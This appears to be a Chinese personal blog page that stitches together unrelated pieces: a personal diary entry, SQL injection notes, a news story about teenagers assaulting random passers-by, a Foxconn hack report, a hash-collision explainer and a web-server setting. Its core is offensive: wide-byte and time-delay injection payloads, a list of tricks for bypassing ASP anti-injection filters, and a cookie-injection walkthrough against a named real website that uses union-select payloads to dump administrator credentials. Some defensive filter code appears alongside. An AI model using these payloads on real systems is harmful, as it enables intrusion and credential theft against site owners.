记得有古人说什么薄酒可忘忧,丑妇可白头,徐行不必驷马,称身不必狐裘 

我想我要是有这般情怀，那活着都做了些什么，也无可厚非了。怀念自己一个人的时候，可以自由散漫的做着自己的事，可以大大咧咧的画着自己赚来的钱，怀念去学校周边捕鱼时候的情景,

每次都会带上500去那家游戏厅玩上一天，细细算来那一个月输的钱有5000+了，但是不算什么，我开心了，毕竟5000块钱买房子不可能，甚至连个厕所都买不下来，存我不知道要存到什么时候，

我倒不如好好的做自己喜欢干的事，记得那时候的生活可能是今天赚1000，明天赚2000，后天赚5毛，甚至一份没有，这种生活显然不是我要的，但是怎么说呢，现在这种朝九晚五的职业生涯更

不是我要的，每个月守着那么微薄的收入，不到三天就花干净的我，蛋快碎了，我想我还是需要多多充电，调整一下自己的精神状态，不然日子久了 锐气没了，人就颓了，目前需要的是充电，科

学技术永远是第一生产力，只有不断的夯实了自己，才能顶的上一片蓝天，细细算来，我还有很多要做的事情，喜欢网络安全的我从来就没有放弃过，我需要的是坚持，中国不免有人才，也不会

少了我一个，所以我要跻身进入我想到达的那个领域。

 生活中不免有很多sb，很多自以为事的sb，你跟他一般见识那你就输了~呵呵，有时候想想，感觉笑了，我不是救世主，我为什么不让那些家伙一直傻下去呢，我想也许以后我这样去考虑生活

是不是会更加惬意呢！

  又到了凌晨时分，宁静的夜，这般美，我的黑夜比白天多！

有时候我们注入的时候很难用and 1=1和 and 1=2来判断是否存在注入。。特别是像宽字节注入这种。。就比如说搜索型注入吧。。当存在宽字节注入时我们加上了%d5这样的。。数据库是查不到的。

这是我们就可以用延迟注入来判断 （当然or语句应该也是可以的，只是一点思路）

比如：

word=%d5%27 and 1=1%23

word=%d5%27 and 1=2%23

是判断不出是否存在注入的，因为都没查询到，这时我们可以构造：

word=%d5%27 and id=benchmark(1800000,md5(144111))%23

因为id这个字段一般都是存在的，将144111算md5值算1800000次，必然需要一定的时间，于是就产生了延迟，如果浏览器假死的话就存在注入漏洞。

以上只是一点思路。。大牛不要拍砖。

关于宽字节注入的知识，可以看这里：

PHP 双字节、宽字节编码漏洞

利用GBK双字节编码突破PHP单引号转义限制进行SQL注入

作者：798146410

时间：2012-2-22 21:39

内容：

现在网上流传很多防注入代码。这些真的有用吗？这是在网上找的一个防注入代码

例如：

''''--------定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
''''自定义需要过滤的字串,用 "|" 分隔
Fy_In = "''''|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|<|>|||-|_"
Fy_Inf = split(Fy_In,"|")
If Request.Form<>"" Then
For Each Fy_Post In Request.Form 

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language=JavaScript>alert(''''网长友情提示↓

网站在conn.asp插入上述代码把基本上能过滤的查询语句都过滤了。带式仔细找，貌似一个=（等号）没有过滤。。大家再找找。。。

等等。。

一个等号就可以。。。。当我们我们输入and 1=1和和1=2时出现对话框。。记录了我们的ip和提交方式什么的。

我们是不是可以吧 and变成没有这些字符的语句呢？找了想到 base64字符。我们接着实验。。。成功。这里

又找了几个站，发现有的可以用这种方法注入。有的不可以。。大家不妨在注入的时候试一下

这段过滤代码所存在的问题如下：

1、目测没有过滤Get、cookie提交方式，只过滤了post，而asp程序员最喜欢使用 Request(“a”) 这种方式获取数据，这种语句是不限定数据提交方式的，可以是get、cookie、post中任意一种，都可以获得数据（如果多个方式同时提交，则按照先后优先级获取数据，我记得默认优先级顺序为：Request.QueryString → Request.Form → Request.cookies → Request.ServerVariable），所以形同虚设。

2、Response.Write 后边如果没有 Response.End，也形同虚设，禁用js或其他发包方式即可，原理很简单不解释了，由于你代码不全（写这个文章的时候，楼主只是贴了一小段代码，后来补全了，这个不是重点，关键在于这篇文章所讲的方法），所以无法判断是否存在该缺陷。

3、大略的看了一下，他过滤的字符集没有关键词：or，这是一个严重的失误。

4、……

这几个缺点，稍微好一点的防注入过滤程序应该都不存在，除非作者太白痴了。。。

至于你说的把and变成“没有”这些字符的语句，可以参照以下方法：

1、变通法，例如他没有过滤 or，那么可以用：test.asp?id=999 or exists(select * from admin)、test.asp?id=999 or 1>2，注意：这个999必须是一个不存在的ID，让or前边的表达式运算值为false，这样整个语句的返回值就以or后的表达式运算值为准了。

2、“替换”大法，如果碰到直接替换的那种过滤程序，可以使用：test.asp?id=1 aandnd 1>2，这样执行一次替换后，结果就变成了：test.asp?id=1 and 1>2，其他关键词同理，很简单易懂的方法，大多数过滤程序都存在这个缺陷。

3、还可以使用打乱大小写字母的写法，因为在 Asp 中，Replace、Instr 等处理字符串函数默认是大小写敏感的，例如：sEleCT <> select，这是个极容易被忽视的问题。

4、使用注释方法，例如过滤了空格的话，可以用：test.asp?id=1/**/and/**/1=1，再例如，当过滤select时，可以：union/**//*!select*/1,2,3,4，或：union/**/s/**/elec/**/t/**/1,2,3,4，甚至还可以：union/**//*!5100select*/1&id=2,3&id=4，5100为mysql的版本号。

5、打碎关键词，原理很简单，如果你提交：test.asp?id=127/*&id=*/an&id=d/**/1=1 时，Asp 接收到的结果是：127/*, */an, d/**/1=1，注意中间的空格，再过滤掉逗号和空格就变成了：127/**/and/**/1=1，然后你懂的……php 的无效，直接覆盖了。这个使用条件比较苛刻，需要过滤逗号和空格，但我估计存在这种问题的站点依然不少。

6、过滤了空格还可以用：/**/、　（这是汉字空白字符）、chr(10)、chr(13)，等字符充当空格。

7、……

关于 Sql 语句中的注释符，再补充一点知识：

Access 中没有专门的注释符号，因此“/**/”“–”“#”都没法使用，但是可以使用空字符 “NULL” (%00) 代替，例如：’ UNION SELECT Count(*) FROM admin%00

关于 Asp 打碎关键词，具体的知识可以去看：http://lcx.cc/?FoxNews=1245.html

还有，如果是mysql数据库的话，还存在宽字节注入等问题，这些就不一一说明了，关于宽字节注入的知识，可以去看：

PHP 双字节、宽字节编码漏洞

利用GBK双字节编码突破PHP单引号转义限制进行SQL注入

突破防注入过滤，继续 Sql 注入，这方面的技巧、经验相当的多，这里只是略提一下，实际上都可以写成一本书，大家发散思维，方法很多的，欢迎补充。

在 Asp 中彻底封死注入的方法：

1、数字型：

Dim Tmp
Tmp = Request("test")
IF Len(Tmp) > 9 then
    Response.Write "fuck you!"
    Response.End
ElseIF IsNumber(Tmp) = False Then
    Response.Write "fuck you!"
    Response.End
ElseIF Instr(Tmp, "+") > 0 Then
    Response.Write "fuck you!"
    Response.End
ElseIF Instr(Tmp, "-") > 0 Then
    Response.Write "fuck you!"
    Response.End
ElseIF Instr(Tmp, ".") > 0 Then
    Response.Write "fuck you!"
    Response.End
Else
    Response.Write "ok!"
End IF

2、字符型：

Dim Tmp, I
Tmp = Request("test")
Tmp = Replace(Tmp, "'", "\'")
Tmp = Replace(Tmp, """", "\""")
Tmp = Replace(Tmp, chr(10), "")
Tmp = Replace(Tmp, chr(13), "")
Response.Write "ok!"

这样完全就可以封死了，不用搞什么过滤关键词，弄一堆字符集，那种方法太恶心了，效率又底……

Sql 注入漏洞的产生原因，就是因为程序员的不细心、缺乏安全意识，若是程序员平时写程序的时候，就注意了并避免了这些细节问题，那么为什么还需要用第三方防注入程序，进行所谓的修补呢？

再唠叨一下，经过这几年的发展，如今的防注入程序已经做得非常好了，已经不是很容易就可以突破了，但是稍微细心一下，有些还是可以再利用的。

参考资料：

基于 SQL 注入（sql injection） 介绍一些注射技巧 – 技术文章

SQL绕过注入最新代码

ASP 绕过防注入的新思路：打碎关键字

PHP 双字节、宽字节编码漏洞

利用GBK双字节编码突破PHP单引号转义限制进行SQL注入

楼主后来补充的完整的代码：

<%
dim sql_injdata ,SQL_inj,SQL_Get,SQL_Post,SQL_Cookies,SQL_Data
    SQL_injdata = "<%|script|insert|select|delete|exec|cast|update|chr|master|truncate|declarei|eval"
    if stopwords<>"" and instr(LCase(Request.ServerVariables("PATH_INFO")),"siteconfig.asp")=0 then
    SQL_injdata= SQL_injdata&"|"&stopwords
    end if
    SQL_inj = split(SQL_Injdata,"|")

if checksqlin="Yes" then
    If Request.Form<>"" Then StopInjection(Request.Form)
    If Request.QueryString<>"" Then StopInjection(Request.QueryString)
    If Request.Cookies<>"" Then StopInjection(Request.Cookies)
end if

Function StopInjection(values)
For Each SQL_Get In values
        For SQL_Data=0 To Ubound(SQL_inj)
          'if instr(LCase(request(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then
            if instr(LCase(replace(request(SQL_Get),chr(34),"'")),Sql_Inj(Sql_DATA))>0 Then
             '“"”无法直接写入到变量“SQL_injdata”中，在这里替换“"”为“'”提示之
            Response.Write "<script>alert('检测到非法信息，已禁止本次提交！');history.back()</script>"
            Response.end
          end if
        next
      Next
end function
%>

都说年少容易轻狂，但轻狂到残害无辜路人，则未免叫人愤慨。近日，南京玄武警方快速出击，仅用24个小时便将“暴打路人甲”的15名团伙成员抓获。这些嫌疑人都是90后，年龄从16-18岁不等。他们为寻求好玩刺激，发明了这样一个“暴打路人甲”的游戏，随机选择路人，突然围住别人就是一顿暴打。从2月17日深夜10点至第二天凌晨6点多，他们连续殴打了三名无辜路人，导致被害人受伤。

外地考生逛街突被狂揍

2月17日深夜10点多，玄武公安分局新街口派出所接到报警称，有人在珠江路被打。民警赶到现场后，看到一小伙子倒在血泊中，另一小伙被同伴扶着站在旁边。民警随后将受伤小伙送到医院救治，并询问了事情经过。原来，这三个小伙子都是到南京参加艺考的考生，躺在地上的叫李明，受伤较轻的叫吴刚，另一人叫杨云。当晚10点左右，他们在珠江路逛街，走到距太平北路不远时，突然被七八个小青年围拢。其中一个人突然冲他们说，“看我们干什么？”李明等人被问得莫名其妙之际，正待张口回答，一记甩棍就飞将过来，将李明击倒，其他人则围上来拳打脚踢。

杨云见势不妙拔腿就跑，吴刚则本能地上前阻止这些人殴打李明，结果也招来一顿痛殴。路上的行人见这帮人手中拿着甩棍等凶器，都不敢上前劝架。两三分钟后，这些人停了手，还指着路人威胁，让路人不要围观少管闲事。随后，这伙人排成一队迈着整齐的步伐离开。吴刚说，打人者和他们差不多大，应该是高中生或者大学生，年龄都不大。

出差来宁也无辜遭到暴打

就在新街口派出所民警对此展开调查时，2月18日凌晨5点多，太平北路又发生了外地人莫名被打的事件。当天凌晨，外地来宁出差的顾伟和朋友聚会后打车返回太平北路的宾馆，刚下出租车就被几个人打倒在地，一顿狂殴。毫无防备的顾伟当即被打懵，只能本能地死命护住自己的要害部位，但打他的人似乎有些丧心病狂，从开始的拳打脚踢，发展到用皮带抽，最后竟然操起一辆自行车猛砸顾的头部。顾伟说，他隐约看到打他的人是三四个小伙子，还有几个女孩在一边围观。

两三分钟后，打人者离去。顾伟拨打了报警电话，民警现场勘查后，从附近一监控设备中调取了顾伟被打的录像。录像显示，殴打顾伟的是三男三女6个人，三个女的在旁边观看，并未动手，而三个男的则打得十分起劲，顾伟所说的自行车，是这些人从路对面搬来的。

24小时破案抓获15嫌疑人

一夜之内连发两起街头暴力案件，而打人者丝毫不求财，也不拿其他东西，打完人就走。受害人并不在南京生活，在南京也没有和任何人结怨，这让民警感到非常纳闷。案情重大，玄武公安分局局长胡士宁立即组织刑警大队和新街口派出所组成联合侦破小组，出动50余名警力投入了这两起案件上。经李明等人辨认，殴打顾伟的人和打他们的不是同一伙人。

经现场勘查并结合走访摸排，警方很快掌握了两伙嫌疑人的体貌特征。而在串并案件的过程中，警方又有了重大发现。18日凌晨，又有一名骑自行车的路人被一群小年轻无辜殴打，打人者动机不明。经受害人辨认，警方确定和殴打李明的是同一伙人，而且还增加了一个团伙成员。玄武公安分局刑警大队大队长丁旭告诉记者，办案民警们都憋足了劲儿要抓到他们，一定要问问他们为什么打人。18日晚间，15名犯罪嫌疑人陆续到案，此时距离第一起案件案发还不到24小时。

团伙成员称打人只为好玩寻刺激

经查，15名嫌疑人都是90后，年纪都在十七八岁，最小的仅16岁。这些人都是技校、职校的学生，平时混迹于酒吧、发廊等处。

而令民警气愤的是，他们交代作案动机时称，他们这样做没有什么特别的动机，纯粹把这当游戏玩，而且，他们还给这游戏起了个名字，叫“暴打路人甲”。从去年开始，他们就玩上了这种暴力游戏，没有固定目标，没有固定地点，没有固定时间。聚在一起后，只要有人提议去“暴打路人甲”，大家就开始上街寻觅目标。目标的选择很随机，如果他们决定殴打第十个经过眼前的人，那第十个就倒霉了。每次游戏前，这些人还要猜拳，以确定谁打第一拳。

嫌疑人还交代，这种游戏的灵感来自网上的一个无聊的帖子。他们实践了一两次后，从中感受到刺激和快感，便逐渐迷上了这一游戏，打人的工具也从最初的赤手空拳发展到现在购买甩棍、携带木棍等。一些嫌疑人一开始胆小不敢打，但在同伙的怂恿下胆子越来越大。目前，15名嫌疑人因涉嫌寻衅滋事被警方依法刑事拘留。不少嫌疑人的家长得知孩子的行为后都感到很吃惊，称没想到孩子会干这种事。警方提醒广大家长和学校，多关心孩子，多与他们沟通，对他们的行为进行正确的引导。

北京时间2月8日晚间消息，富士康服务器被一个称作“SwaggSec”的黑客组织攻击，并由此暴露出苹果、IBM等厂商的用户名和密码信息。

据称，该组织是出于对富士康恶劣的工作环境的声讨，也包括对传说中的iPhone 5的信息关注。

该组织直言，他们欢迎媒体、安全专家和其他有兴趣的团队来关注此次安全泄漏事件。而且，几乎没有遇到任何阻力就绕过了富士康防火墙，通过获取的用户名和信息，可以伪造IBM、苹果、微软等厂商的订单。

下面还是具体拿个实例来给大家演示下，目标站：http://www.ytop35.com/Products_show.asp?id=284

，同时也是注入点。我们首先要检测下按照平时的方式注入，在网址后面加 and 1=1。

  可见是使用了防注入系统的，但是目前我们是使用get方式提交的参数，那现在我们将“id=284”这个参数使用cookie提交看看程序对数据接收是否直接使用 request(“xx”)的方式？要更改成cookie方式提交，我们首先要访问正常的页面，即是：http://www.ytop35.com/Products_show.asp?id=284，等页面完全打开之后，我们将IE地址栏清空，然后写上:javascript:alert(document.cookie=”id=”+escape(“284″)); 这里的“id=”便是“Products_show.asp?id=284”中的“id=”，“escape(“284″)”中的“284”是“Products_show.asp?id=284”中的“id=284”了，这两处要根据实际情况来定义。

 现在更改好了cookie后我们就要试下能不能正常访问了，现在在另外一个窗口中我们打开以下地址：http://www.ytop35.com/Products_show.asp? 既是将“id=284”去掉后的，然后看是否能正常访问。

可见访问之后的页面与访问http://www.ytop35.com/Products_show.asp?id=284的时候是一样的，这样就说明程序在使用request对象获取数据的时候并未指明具体使用什么方法来获取，而是直接使用request(“xx”)的方式。现在cookie形成的一个重要因素已经明确了，接下来我们测试下能否提交特殊字符，看程序是否对数据进行过滤。我们再回到刚才更改cookie的页面，然后在IE地址栏处填写javascript:alert(document.cookie=”id=”+escape(“284 and 1=1″)); 回车后再去http://www.ytop35.com/Products_show.asp?页面刷新，看页面是否正常，如果正常我们再提交javascript:alert(document.cookie=”id=”+escape(“284 and 1=2″));   然后再去刷新，这个时候就会看见出错了。

很明显就能看到错误了，而且产品内容也米有显示，到此便可以确定该页面能使用cookie注入了，接下来来的利用过程就和普通注入一样了。我们可以使用union联合查询爆出管理员的账号和密码，但前提是需要知道管理员的表名和字段名，不过我们可以通过猜解。

       接下来我们提交:javascript:alert(document.cookie=”id=”+escape(“284 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from manage”)); 发现有错误，我们再提交javascript:alert(document.cookie=”id=”+escape(“284 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin”));发现返回正常页面。

 看到熟悉的画面了吧，这就表示网站数据库存在admin这个表，因我们之前一次提交的是javascript:alert(document.cookie=”id=”+escape(“284 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from manage”));，数据库中不存在mange这个表，自然就出错了，使用更换from 处可以来猜解表明，那么现在我们在6和17的地方试试username和password看看提交后是否出错，如果出错那么就表示不存在username或者password字段。我们提交：javascript:alert(document.cookie=”id=”+escape(“284 union select 1,2,3,4,5,username,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin”));

可见，原来显示6和17的地方现在爆出了管理员的账号和密码了，不过这个密码破不出来，大家可以自己拿网站去练练。总的说来cookie注入和普通注入是一样的，只不过是在提交注入语句的过程不一样而已。如果对普通注入的原理又说了解的话，那么cookie注入也就不难了。

hash碰撞原理: 

Hash，简单来讲，是一种将任意长度的输入变换成固定长度的输出，固定长度的输出在”实际应用场景”下可以代表该输入。Hash函数通常被翻译成散列函数。Hash通常用来校验信息的一致性。 

Hash函数的实现多种多样，在安全领域应用最为广泛的是SHA-x系列和MDx系列。Hash函数也划分为带密钥的Hash函数和不带密钥的Hash函数，通常所说的Hash函数是不带密钥的Hash函数。这里对Hash算法的实现原理不做更多的探讨。 
 
由于Hash固定长度输出的特性，必然会存在多个不同输入产生相同输出的情况。如果两个输入串的hash函数的值一样，则称这两个串是一个碰撞(Collision)。在理论范围内，存在一个输出串对应无穷多个输入串，所以碰撞具有其必然性。 

如果找到碰撞，那么意味着我们可以破坏信息的一致性而不被接收方察觉，搜寻指定输入的Hash碰撞值的过程被称作”Hash破解”。这里需要说明的 是，Hash函数必须是不可逆的，所以不存在从散列值到原始输入的破解（这里不包括暴力破解，使用彩虹表是暴力破解的最佳方式，但是仍然无法保证破解到的 数据是原始数据）。设计不良的Hash算法，很容易让人找到碰撞值。 

kangle web服务器 是一款跨平台、功能强大、安全稳定、易操作的、高性能的、国产开源的web服务器和反向代理服务器软件。简称：kangle 
除此：kangle也是一款专为做虚拟主机研发的web服务器。实现虚拟主机独立进程、独立身份运行。用户之间安全隔离，一个用户出问题不影响其他用户。安全支持php、asp、asp.net、java、ruby等多种动态开发语言。 

kangle 2.7.5新增一个最大post参数，轻松防住这个漏洞。进入kangle管理后台3311设置。点左边配置==>数据交换，出现如下界面。如图: 

最多POST参数,这里为了测试只写2，一般建议输入500，即可。使用本功能，一定要打开使用临时文件。否则无效。效果图: